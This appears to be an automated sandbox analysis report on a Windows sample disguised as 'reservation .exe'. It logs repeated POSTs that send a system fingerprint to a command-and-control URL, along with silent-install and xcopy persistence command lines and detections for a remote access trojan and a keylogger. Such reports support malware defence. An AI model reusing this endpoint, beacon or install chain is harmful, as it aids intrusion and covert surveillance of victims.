                                                                                                                          2024-11-19 18:15:57 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:57 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          44192.168.2.550129212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:58 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:58 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          45192.168.2.550132212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:59 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:59 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          46192.168.2.550141212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:16:01 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:16:01 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          47192.168.2.550144212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:16:02 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:16:02 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          48192.168.2.550147212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:16:03 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:16:03 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          49192.168.2.550150212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:16:05 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:16:05 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          50192.168.2.550153212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:16:06 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:16:06 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          51192.168.2.550156212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:16:06 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:16:06 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          52192.168.2.550159212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:16:11 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:16:11 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Statistics

                                                                                                                          CPU Usage

                                                                                                                          Click to jump to process

                                                                                                                          Memory Usage

                                                                                                                          Click to jump to process

                                                                                                                          High Level Behavior Distribution

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Behavior

                                                                                                                          Click to jump to process

                                                                                                                          System Behavior

                                                                                                                          General

                                                                                                                          Target ID:0
                                                                                                                          Start time:13:13:59
                                                                                                                          Start date:19/11/2024
                                                                                                                          Path:C:\Users\user\Desktop\reservation .exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\reservation .exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:7'988'632 bytes
                                                                                                                          MD5 hash:DED33758F9470A6EE7CCABA58301F651
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:2
                                                                                                                          Start time:13:14:00
                                                                                                                          Start date:19/11/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp" /SL5="$10464,7120736,816128,C:\Users\user\Desktop\reservation .exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:3'152'384 bytes
                                                                                                                          MD5 hash:D3E870E4BBE9AAF106AB9B0510956A89
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:3
                                                                                                                          Start time:13:14:00
                                                                                                                          Start date:19/11/2024
                                                                                                                          Path:C:\Users\user\Desktop\reservation .exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\reservation .exe" /verysilent /password=84t66giu
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:7'988'632 bytes
                                                                                                                          MD5 hash:DED33758F9470A6EE7CCABA58301F651
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:4
                                                                                                                          Start time:13:14:00
                                                                                                                          Start date:19/11/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp" /SL5="$2046A,7120736,816128,C:\Users\user\Desktop\reservation .exe" /verysilent /password=84t66giu
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:3'152'384 bytes
                                                                                                                          MD5 hash:D3E870E4BBE9AAF106AB9B0510956A89
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:6
                                                                                                                          Start time:13:14:41
                                                                                                                          Start date:19/11/2024
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\qilq\g3ll5lm.bat""
                                                                                                                          Imagebase:0x790000
                                                                                                                          File size:236'544 bytes
                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:7
                                                                                                                          Start time:13:14:41
                                                                                                                          Start date:19/11/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:8
                                                                                                                          Start time:13:14:41
                                                                                                                          Start date:19/11/2024
                                                                                                                          Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\qilq\*" "C:\Users\user\AppData\Roaming\fat\"
                                                                                                                          Imagebase:0x2a0000
                                                                                                                          File size:43'520 bytes
                                                                                                                          MD5 hash:7E9B7CE496D09F70C072930940F9F02C
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:10
                                                                                                                          Start time:13:15:09
                                                                                                                          Start date:19/11/2024
                                                                                                                          Path:C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\fat\ast.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:7'543'992 bytes
                                                                                                                          MD5 hash:8002D9E5851728EB024B398CF19DE390
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\fat\ast.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\fat\ast.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: C:\Users\user\AppData\Roaming\fat\ast.exe, Author: Joe Security
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:11
                                                                                                                          Start time:13:15:22
                                                                                                                          Start date:19/11/2024
                                                                                                                          Path:C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\fat\ast.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:7'543'992 bytes
                                                                                                                          MD5 hash:8002D9E5851728EB024B398CF19DE390
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:12
                                                                                                                          Start time:13:15:30
                                                                                                                          Start date:19/11/2024
                                                                                                                          Path:C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\fat\ast.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:7'543'992 bytes
                                                                                                                          MD5 hash:8002D9E5851728EB024B398CF19DE390
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          Disassembly

                                                                                                                          Reset < >

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:3.5%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:15.8%
                                                                                                                            Total number of Nodes:774
                                                                                                                            Total number of Limit Nodes:48
